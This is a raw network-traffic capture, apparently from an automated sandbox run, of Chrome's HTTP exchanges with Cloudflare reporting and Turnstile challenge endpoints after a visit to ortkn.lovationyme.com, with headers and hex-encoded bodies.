                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC534OUTOPTIONS /report/v4?s=6KdRWvwSuOU39JixHn381rvLwHcjJW8mEQ9TwJjsoSI6IJgWT73h9kzOQKl3kgL4P4VYpzxW9gQ7GhH2Rri36Jw96qZBgwLE3mrmmSDVpqWRw7pNOlLcpoOGZ7XaWg%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://ortkn.lovationyme.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:09 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-max-age: 86400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              22192.168.2.44976735.190.80.14431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC470OUTPOST /report/v4?s=6KdRWvwSuOU39JixHn381rvLwHcjJW8mEQ9TwJjsoSI6IJgWT73h9kzOQKl3kgL4P4VYpzxW9gQ7GhH2Rri36Jw96qZBgwLE3mrmmSDVpqWRw7pNOlLcpoOGZ7XaWg%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/reports+json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC438OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 72 74 6b 6e 2e 6c 6f 76 61 74 69 6f 6e 79 6d 65 2e 63 6f 6d 2f 35 77 4c 6d 4e 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 32 30 2e 36 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":120,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ortkn.lovationyme.com/5wLmN/","sampling_fraction":1.0,"server_ip":"172.67.220.61","status_code":404,"type":"http.error"},"type":"network-er
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              23192.168.2.449768104.18.94.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-chl-out: a5EPe8SKQd6ORjDZJd1Xhx/Dv1U9c1d7bk8=$8bqKG0p38bjGtq/w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf87257f90e8c8d-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: invalid


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              24192.168.2.449769104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8cf87240ceda19cb/1728414789424/DynHffhfYX2zijG HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8725b3ca04406-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:10 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4f 00 00 00 26 08 02 00 00 00 0a ad 51 43 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRO&QCIDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              25192.168.2.449770104.18.94.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:11 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8cf87240ceda19cb/1728414789424/DynHffhfYX2zijG HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:11 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8725f196a42fc-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:11 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4f 00 00 00 26 08 02 00 00 00 0a ad 51 43 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDRO&QCIDAT$IENDB`


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              26192.168.2.449771104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:11 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8cf87240ceda19cb/1728414789425/ab48c5522a4143b2a8c3d5d131761a80543f5a9c6a71282f4dd847fddb4622a9/OuGk2ktq1FqICuL HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:11 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:11 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 71 30 6a 46 55 69 70 42 51 37 4b 6f 77 39 58 52 4d 58 59 61 67 46 51 5f 57 70 78 71 63 53 67 76 54 64 68 48 5f 64 74 47 49 71 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gq0jFUipBQ7Kow9XRMXYagFQ_WpxqcSgvTdhH_dtGIqkAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:11 UTC1INData Raw: 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: J


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              27192.168.2.449774104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 31940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-Challenge: 6c598c69372390f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC16384OUTData Raw: 76 5f 38 63 66 38 37 32 34 30 63 65 64 61 31 39 63 62 3d 77 61 4c 47 71 38 54 2d 6d 51 6c 54 6d 54 51 54 38 54 58 69 62 37 51 54 5a 69 39 69 41 45 46 30 51 69 39 69 79 47 70 51 69 6e 69 6a 25 32 62 33 7a 54 33 63 69 79 46 51 31 54 75 51 69 70 4f 69 70 36 44 69 4d 69 33 4c 69 42 69 38 65 6c 69 4d 47 37 77 4e 49 51 77 67 61 54 32 69 38 61 54 37 33 58 71 4d 31 69 56 47 54 43 6b 69 43 6b 4f 47 69 33 69 70 6a 55 75 50 6d 43 59 73 6d 37 7a 68 6d 24 57 65 62 41 24 37 69 69 70 68 69 70 31 46 34 68 46 69 53 37 46 69 76 4a 46 54 76 46 56 38 59 50 6b 6a 2b 47 54 77 24 56 4a 57 4c 6f 63 61 69 38 45 24 2b 34 67 30 24 4a 64 6d 69 6c 5a 61 69 75 78 58 6b 4a 30 7a 69 54 2b 54 30 67 45 7a 61 64 47 69 32 67 55 6d 59 63 4a 57 38 7a 6e 68 64 68 36 4e 59 37 6b 44 64 36 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: v_8cf87240ceda19cb=waLGq8T-mQlTmTQT8TXib7QTZi9iAEF0Qi9iyGpQinij%2b3zT3ciyFQ1TuQipOip6DiMi3LiBi8eliMG7wNIQwgaT2i8aT73XqM1iVGTCkiCkOGi3ipjUuPmCYsm7zhm$WebA$7iiphip1F4hFiS7FivJFTvFV8YPkj+GTw$VJWLocai8E$+4g0$JdmilZaiuxXkJ0ziT+T0gEzadGi2gUmYcJW8znhdh6NY7kDd6re
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC15556OUTData Raw: 33 71 75 76 6d 51 51 30 75 54 56 46 69 69 49 78 61 38 34 75 6f 61 77 2b 49 33 6f 69 38 54 69 76 69 38 2b 30 42 44 59 61 38 66 4f 65 4c 41 47 58 48 53 50 4b 30 6d 54 61 69 47 69 66 69 56 47 30 6d 69 73 69 76 47 38 38 69 6e 38 35 4c 54 73 69 43 69 69 41 54 4a 65 45 67 4e 4c 69 2d 69 5a 69 33 2b 54 38 69 6c 47 58 4c 69 70 4c 38 47 38 6d 30 4e 69 73 47 77 2b 69 6f 69 4b 47 33 4a 30 4f 75 24 47 77 6c 38 78 69 74 47 77 2b 54 38 51 4d 24 33 55 38 75 69 4f 38 7a 66 69 35 69 50 2b 56 6d 38 4d 47 71 5a 73 47 30 6d 46 4a 69 37 34 32 31 69 2d 69 69 58 4f 53 47 71 5a 73 37 38 35 54 51 56 4c 61 4f 42 2b 41 47 76 6b 38 6b 54 61 41 77 2b 69 5a 69 44 56 47 41 38 41 46 35 47 75 4c 33 51 69 74 69 63 76 53 38 69 71 6d 38 59 30 6b 54 4a 66 76 53 6f 4d 47 78 47 50 4c 33 38 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 3quvmQQ0uTVFiiIxa84uoaw+I3oi8Tivi8+0BDYa8fOeLAGXHSPK0mTaiGifiVG0misivG88in85LTsiCiiATJeEgNLi-iZi3+T8ilGXLipL8G8m0NisGw+ioiKG3J0Ou$Gwl8xitGw+T8QM$3U8uiO8zfi5iP+Vm8MGqZsG0mFJi7421i-iiXOSGqZs785TQVLaOB+AGvk8kTaAw+iZiDVGA8AF5GuL3QiticvS8iqm8Y0kTJfvSoMGxGPL38i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 26796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-chl-gen: hR9+M/mhrNW4YmGoiLxBnoGh57muF9FEIh7MVhdnOhT4eT1fTapOD+4fmZR9JkDFj6oGhPc8WCrRbwZ6$tXnRdf21u1N4wZNy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf872713a254414-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1069INData Raw: 6f 36 65 38 72 4a 32 76 72 34 75 61 6e 71 2b 4e 6d 4a 32 38 6f 6f 43 30 66 73 65 4a 70 61 37 4c 6a 61 6a 42 76 73 2b 73 32 62 43 52 6c 37 6a 64 6c 37 6a 41 76 61 43 5a 77 36 4b 59 76 37 44 6f 31 37 54 4c 76 65 61 74 79 75 66 75 37 4d 62 74 38 65 44 7a 75 64 44 6d 79 4e 4f 38 73 66 6d 35 74 4d 76 30 77 4e 7a 68 33 51 58 63 2f 66 76 62 37 52 48 50 42 77 6b 55 38 39 51 48 38 77 66 52 37 4f 58 62 32 75 59 42 37 4f 34 69 44 52 37 32 4a 42 49 42 2b 52 77 4e 2f 50 59 73 4b 68 34 46 4c 66 49 50 4d 41 44 79 4c 53 38 61 48 66 67 38 4c 54 55 58 48 53 34 35 50 52 41 30 46 78 70 4c 51 6a 6f 69 51 44 41 35 44 54 4d 46 54 69 70 4e 53 31 59 55 57 6a 73 38 47 6c 49 61 4b 68 31 64 55 69 41 76 50 56 64 65 49 6b 4a 58 50 55 64 4c 59 7a 42 61 53 57 68 53 56 55 42 45 64 44 4e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o6e8rJ2vr4uanq+NmJ28ooC0fseJpa7LjajBvs+s2bCRl7jdl7jAvaCZw6KYv7Do17TLveatyufu7Mbt8eDzudDmyNO8sfm5tMv0wNzh3QXc/fvb7RHPBwkU89QH8wfR7OXb2uYB7O4iDR72JBIB+RwN/PYsKh4FLfIPMADyLS8aHfg8LTUXHS45PRA0FxpLQjoiQDA5DTMFTipNS1YUWjs8GlIaKh1dUiAvPVdeIkJXPUdLYzBaSWhSVUBEdDN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1369INData Raw: 71 33 59 31 62 53 39 74 36 57 35 76 73 6a 70 71 64 6a 4e 70 64 6e 4a 37 4b 6a 50 36 39 2f 65 77 50 43 30 75 62 72 44 74 64 72 48 33 63 7a 5a 34 63 4c 4f 7a 74 54 58 2f 65 4c 46 43 51 34 49 42 38 48 4a 44 41 7a 70 46 41 7a 6b 34 75 33 69 39 68 77 55 33 66 6a 33 44 76 4c 36 47 76 58 78 37 68 34 43 39 78 2f 34 36 66 34 62 41 69 67 75 4c 42 77 72 4e 51 73 58 4a 67 55 4d 2b 79 73 66 50 30 45 63 44 77 77 58 4f 67 54 34 53 54 30 41 4a 42 6b 4d 4a 69 46 47 52 41 38 6a 52 7a 34 71 49 52 4d 50 4e 43 63 6b 56 44 34 57 50 46 63 36 59 79 41 79 50 57 68 66 4f 6a 35 62 54 47 6c 48 4e 7a 35 5a 4f 31 31 48 52 69 39 79 59 55 6b 32 55 56 6f 7a 61 46 59 32 53 54 39 61 51 6c 5a 57 67 6e 56 47 59 48 68 6a 57 31 31 37 5a 31 46 45 68 34 64 55 6a 57 4f 4e 6c 49 4f 4c 61 34 75 56
